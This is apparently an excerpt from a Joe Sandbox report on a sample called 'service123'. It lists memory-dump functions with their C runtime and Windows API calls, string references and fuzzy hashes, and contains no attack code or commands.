strlen.MSVCRT ref: 6C9E752C

Strings

*, xrefs: 6C9E7660
basic_string::append, xrefs: 6C9E76CA, 6C9E76D6, 6C9E76E2, 6C9E76EE

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: strlen$strcmp
String ID: *$basic_string::append
API String ID: 551667898-3732199748
Opcode ID: 7cf1ffd7018581844fcd45fdb63a70fcbea9e9e95bbd3fa541e69f59d8597cd8
Instruction ID: 6d3a734b01f6cdf33f86c9ae1cc164f00f2297977b9d8cf998d5a952aae0ce07
Opcode Fuzzy Hash: 7cf1ffd7018581844fcd45fdb63a70fcbea9e9e95bbd3fa541e69f59d8597cd8
Instruction Fuzzy Hash: C2A15D71A046018FDB00EF68C18476EBBF2BF59308F51896DD4989BB45DB35E889CB93

Function 6CA63DD0 Relevance: 12.2, APIs: 7, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 6CA63E6F
memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C9FE9CE), ref: 6CA63ED3
memmove.MSVCRT ref: 6CA63F0B
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C9FE9CE), ref: 6CA63F7A

Strings

basic_string::_M_replace, xrefs: 6CA640FF

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: memmove$memcpy
String ID: basic_string::_M_replace
API String ID: 3033661859-2323331477
Opcode ID: 7867f2776a28fbf263eef4e5a91240c92d09df3f2e2260ffe504ea32d657028f
Instruction ID: a538c83ffacd65d3610887b779a3942a2eecbd48a8c7e678f19dc4af41134e75
Opcode Fuzzy Hash: 7867f2776a28fbf263eef4e5a91240c92d09df3f2e2260ffe504ea32d657028f
Instruction Fuzzy Hash: 56914635A0A3518FC300DF1AC08081EBBF1BF99708F15896DE5C99BB24E774E985CB82

Function 6C9CE800 Relevance: 12.1, APIs: 8, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 1884a794d3d441725b09e7e72905d71cc32fb0140713b8c23ce069bb11cd822c
Instruction ID: 252b34dd0f99c578c8bf5d5c9406bf5fe58572e2224c94b1b2d19f9258db3f0b
Opcode Fuzzy Hash: 1884a794d3d441725b09e7e72905d71cc32fb0140713b8c23ce069bb11cd822c
Instruction Fuzzy Hash: 8B214930B14609CFD700CE18C4C3A8BB3AAAF96314B448A55D48647F58D330E98BC7E3

Function 6C9D9BA6 Relevance: 12.1, APIs: 8, Instructions: 86clipboardCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 6C9D9BA9
IsClipboardFormatAvailable.USER32 ref: 6C9D9DDC
OpenClipboard.USER32 ref: 6C9D9DF0

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: Clipboard$AvailableCloseFormatHandleOpen
String ID:
API String ID: 518195572-0
Opcode ID: 803940a003cfae5a32e415e90d3b18a946be1dc468e3e56701073c47557b990b
Instruction ID: 44ed693fce95290f0b3f569c89c31a406747692448c566ecb450052a7bbaf88c
Opcode Fuzzy Hash: 803940a003cfae5a32e415e90d3b18a946be1dc468e3e56701073c47557b990b
Instruction Fuzzy Hash: C52144B27047028FDB44BF7DD64919E7BF4AB45245F02893CE88696640EB34D449CB93

Function 001C1E70 Relevance: 12.1, APIs: 8, Instructions: 84COMMON

Download Yara Rule

APIs

signal.MSVCRT ref: 001C1EAF
signal.MSVCRT ref: 001C1EF6
signal.MSVCRT ref: 001C1F0F
signal.MSVCRT ref: 001C1F36
signal.MSVCRT ref: 001C1F72
signal.MSVCRT ref: 001C1FBF
signal.MSVCRT ref: 001C1FD5
signal.MSVCRT ref: 001C1FEB

Memory Dump Source

Source File: 0000000F.00000002.4317963896.00000000001C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000F.00000002.4317867359.00000000001C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318055955.00000000001CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318171900.00000000001CE000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318267182.00000000001D1000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1c0000_service123.jbxd

Similarity

API ID: signal
String ID:
API String ID: 1946981877-0
Opcode ID: d0e65c953cd6964a9e251b5e0854295fa8fdbceb579ea790b0a369e75e72da9c
Instruction ID: 168b1bba852cd02bf2f9294b8516d90e8690b35370410dbb73011450bcd389e4
Opcode Fuzzy Hash: d0e65c953cd6964a9e251b5e0854295fa8fdbceb579ea790b0a369e75e72da9c
Instruction Fuzzy Hash: 86310C71588200AAE7206F64C995B2EB6D4BF76358F154D1DE8C4C7282CB7DC8DC9B53

Function 001C4360 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 399COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 001C4378

Strings

Inf, xrefs: 001C4E35, 001C4E4D
NaN, xrefs: 001C4D3B
@, xrefs: 001C4647

Memory Dump Source

Source File: 0000000F.00000002.4317963896.00000000001C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000F.00000002.4317867359.00000000001C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318055955.00000000001CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318171900.00000000001CE000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318267182.00000000001D1000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1c0000_service123.jbxd

Similarity

API ID: _errno
String ID: @$Inf$NaN
API String ID: 2918714741-141429178
Opcode ID: 90a2ca02e05550804de1b4e04bbff10771ba6bad1cf22ab60ce6d7c7ea3ad3d9
Instruction ID: 81b5efb40b4cb55fcc912ab23f4675b0313121eff466d20ace55f5ac24c50c16
Opcode Fuzzy Hash: 90a2ca02e05550804de1b4e04bbff10771ba6bad1cf22ab60ce6d7c7ea3ad3d9
Instruction Fuzzy Hash: B5F1CF7160C3818BD7358F24C4A0BABBBE1BFA5714F258A1DE9DD87281D735D906CB82

Function 6C9D4A30 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 399COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 6C9D4A48

Strings

@, xrefs: 6C9D4D17
NaN, xrefs: 6C9D540B
Inf, xrefs: 6C9D5505, 6C9D551D

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: _errno
String ID: @$Inf$NaN
API String ID: 2918714741-141429178
Opcode ID: e6aa29e13e2af6baa5f75837a2a7e6787e9306806f0741dac3baf7c5b6db8970
Instruction ID: a75120b4cb50439977d70ce52820b61c1980e3e43932e973ea7ceaad0c950478
Opcode Fuzzy Hash: e6aa29e13e2af6baa5f75837a2a7e6787e9306806f0741dac3baf7c5b6db8970
Instruction Fuzzy Hash: F7F1B17160CB858BD7218F28D49039BBBE1BB85318F16CA1DE9DCA7781D734E9098F42

Function 001C3160 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 295COMMON

Download Yara Rule

Strings

0, xrefs: 001C34C6
@, xrefs: 001C342A

Memory Dump Source

Source File: 0000000F.00000002.4317963896.00000000001C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000F.00000002.4317867359.00000000001C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318055955.00000000001CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318171900.00000000001CE000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318267182.00000000001D1000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1c0000_service123.jbxd

Similarity

API ID:
String ID: 0$@
API String ID: 0-1545510068
Opcode ID: e57f9d77be607eb7be2d65c7f691f863806e0b74bc638be5844c6890f5152d77
Instruction ID: 09e60a791a1df933f182dc0420ddc0265eb9a6ba673498f9f9e8076c1c8053c2
Opcode Fuzzy Hash: e57f9d77be607eb7be2d65c7f691f863806e0b74bc638be5844c6890f5152d77
Instruction Fuzzy Hash: 5AC13871E002558BDB19CF68C484B9DBBB1BFA8314F29C25DEC68AB385D734E945CB90

Function 6C9D3830 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 295COMMON

Download Yara Rule

Strings

@, xrefs: 6C9D3AFA
0, xrefs: 6C9D3B96

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID:
String ID: 0$@
API String ID: 0-1545510068
Opcode ID: 852fd2e7f322feda59a9287ec6fcafc659018383277beee50283a5623e34e20d
Instruction ID: 2ba1fa147e34d24e89650b7a93d1f9b43f88edbd9efd31eab724f691abf30751
Opcode Fuzzy Hash: 852fd2e7f322feda59a9287ec6fcafc659018383277beee50283a5623e34e20d
Instruction Fuzzy Hash: 74C16971A04A158BDB04CF78C48079DBBF5BF89315F2AC299E858BB789D334E845CB90

Function 6C9EB810 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 212stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C9EB836
memcmp.MSVCRT ref: 6C9EB85A
memcmp.MSVCRT ref: 6C9EB8CD
memcmp.MSVCRT ref: 6C9EB93F

Part of subcall function 6CA8ADB0: strlen.MSVCRT ref: 6CA8ADBE

memcmp.MSVCRT ref: 6C9EB9D7

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C9EB881, 6C9EB8F2, 6C9EB965, 6C9EB9FE, 6C9EBA1A
basic_string::compare, xrefs: 6C9EB879, 6C9EB8EA, 6C9EB95D, 6C9EB9F6, 6C9EBA12

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: memcmp$strlen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
API String ID: 3738950036-1697194757
Opcode ID: bb7601d09c2ea2fc5e6b912ae9ae9591d6db6f70bac222c0add2df92e459b79c
Instruction ID: 20d7731d8304202f688bc0b7ce0523b8491c5f5307dee25e380c3e8f91367603
Opcode Fuzzy Hash: bb7601d09c2ea2fc5e6b912ae9ae9591d6db6f70bac222c0add2df92e459b79c
Instruction Fuzzy Hash: 0961547260A3119FC300AF6DC98095EBBE5BF98688F15892DE8C997710D331EC85CB96

Function 6C9E7710 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 211stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6CA33320: memset.MSVCRT ref: 6CA33365

strcmp.MSVCRT ref: 6C9E7771
strlen.MSVCRT ref: 6C9E778C
strlen.MSVCRT ref: 6C9E77D3
strlen.MSVCRT ref: 6C9E7844
strlen.MSVCRT ref: 6C9E78B2

Strings

*, xrefs: 6C9E7990

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: strlen$memsetstrcmp
String ID: *
API String ID: 3639840916-163128923
Opcode ID: dcf69a5e2cbb1ca91ee7017f0bac64cfc4a6495fe2ba985d8b225842b9dc451d
Instruction ID: f8f37d57338ec4e9ac50e382dd6c62461962fc1afbfd3e5bfd50e3cb902e29a1
Opcode Fuzzy Hash: dcf69a5e2cbb1ca91ee7017f0bac64cfc4a6495fe2ba985d8b225842b9dc451d
Instruction Fuzzy Hash: 518176B5A05A108FDB00EF29C19865EFBF9FF99304F0185ADD8949B711CB35E849CB82

Function 6C9CE8E0 Relevance: 10.7, APIs: 7, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 6949fccd0a9c3e9d3ac8c5b45f2aac2a255c09ca815fc16772279bff97c29dd2
Instruction ID: 5439d6ec08714b6c780de4674ca543ccf39b402236dcd230afa739ae3886361b
Opcode Fuzzy Hash: 6949fccd0a9c3e9d3ac8c5b45f2aac2a255c09ca815fc16772279bff97c29dd2
Instruction Fuzzy Hash: E851BD706097048FC710CF1AC08265AF7E8BF9A348F444A5EE89A9B755D334D94ACBD7

Function 6C9CE340 Relevance: 10.6, APIs: 7, Instructions: 126synchronizationCOMMON

Download Yara Rule

APIs

CreateSemaphoreW.KERNEL32 ref: 6C9CE487
WaitForSingleObject.KERNEL32 ref: 6C9CE4C8

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: CreateObjectSemaphoreSingleWait
String ID:
API String ID: 1168595426-0
Opcode ID: 897a1fbf0c5c5d75606f7de4186e223090fe1c481aaaaf5c3cbf2220f3cd3091
Instruction ID: ab08beedc411bf82130ad8e87179992162f435ba66200115a5040e4c1e4716a1
Opcode Fuzzy Hash: 897a1fbf0c5c5d75606f7de4186e223090fe1c481aaaaf5c3cbf2220f3cd3091
Instruction Fuzzy Hash: D0512A70B053028BDB58DF39C5867167BF9AB0A318F118528D86687B85DB34E446DBE3

Function 6C9D01F0 Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6C9D0209
memcpy.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6C9D022D
malloc.MSVCRT ref: 6C9D0247
memset.MSVCRT ref: 6C9D0275
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D74
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D79
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D7E

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: abort$malloc$memcpymemset
String ID:
API String ID: 334492700-0
Opcode ID: e6d7780d917140ca2a5588e03258049156473324d9afcb76f04c1c6ed51653e4
Instruction ID: ddf7b949f172b50952c9a385d880945ca612877617b15c412a8cbaf5e0b289d7
Opcode Fuzzy Hash: e6d7780d917140ca2a5588e03258049156473324d9afcb76f04c1c6ed51653e4
Instruction Fuzzy Hash: FB118FB2605A549ED700BF68D48089AB7E8EF64298F46C97DD85997B00EB30E508C661

Function 001C8120 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 001C812C
GetProcAddress.KERNEL32 ref: 001C814C
GetProcAddress.KERNEL32 ref: 001C818B

Strings

__lc_codepage, xrefs: 001C8180
msvcrt.dll, xrefs: 001C8125
___lc_codepage_func, xrefs: 001C8144

Memory Dump Source

Source File: 0000000F.00000002.4317963896.00000000001C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000F.00000002.4317867359.00000000001C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318055955.00000000001CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318171900.00000000001CE000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318267182.00000000001D1000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1c0000_service123.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: ___lc_codepage_func$__lc_codepage$msvcrt.dll
API String ID: 667068680-1145701848
Opcode ID: f50e41cab47be73d560eedbafe9447e2b10c6f98eb6acf3b446a77cc7700d104
Instruction ID: 2cb1e3931674dbce0b9430a0460cf67e2c13af9749f5b1e70b8b9beb177beeb4
Opcode Fuzzy Hash: f50e41cab47be73d560eedbafe9447e2b10c6f98eb6acf3b446a77cc7700d104
Instruction Fuzzy Hash: B6F06DB18443148F9B007F386E89B4B7EF4AA14314F4A453ED885D7200EB75C4A5CBA3

Function 6C9D9171 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 6C9D917C
GetProcAddress.KERNEL32 ref: 6C9D919C
GetProcAddress.KERNEL32 ref: 6C9D91DB

Strings

__lc_codepage, xrefs: 6C9D91D0
msvcrt.dll, xrefs: 6C9D9175
___lc_codepage_func, xrefs: 6C9D9194

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: ___lc_codepage_func$__lc_codepage$msvcrt.dll
API String ID: 667068680-1145701848
Opcode ID: 85b8869f235ecb741651d53387a85628b5275c92aedeced8ac72725d5934beb5
Instruction ID: 48d838096098dae62bcb654cbe69d6c3699a0858d5f315431bceb4b6b05968a1
Opcode Fuzzy Hash: 85b8869f235ecb741651d53387a85628b5275c92aedeced8ac72725d5934beb5
Instruction Fuzzy Hash: EBF062B19457028FEB007FBC9A1B24A7BF4A605214F43853DD889D7700EA70E592C7E6

Function 6C9CEA9B Relevance: 10.5, APIs: 7, Instructions: 21COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D60
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D65
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D6A
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D6F
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D74
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D79
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D7E

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 1e0c335cc361dda1bc33d437742637b5b623609a86091116d78be9412fd93d2e
Instruction ID: c9c4b5f3b6ca457e890bbe961477b3e1c836d7e26b2daa08d64426d6b973e97d
Opcode Fuzzy Hash: 1e0c335cc361dda1bc33d437742637b5b623609a86091116d78be9412fd93d2e
Instruction Fuzzy Hash: 7FB01232ED9A388E4F21657C0522080724DAE3B3CC3069883C46B73E088711F04780D7

Function 6CA64AE0 Relevance: 10.2, APIs: 8, Instructions: 158COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CA6B8AE), ref: 6CA64B63
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CA6B8AE), ref: 6CA64BA5

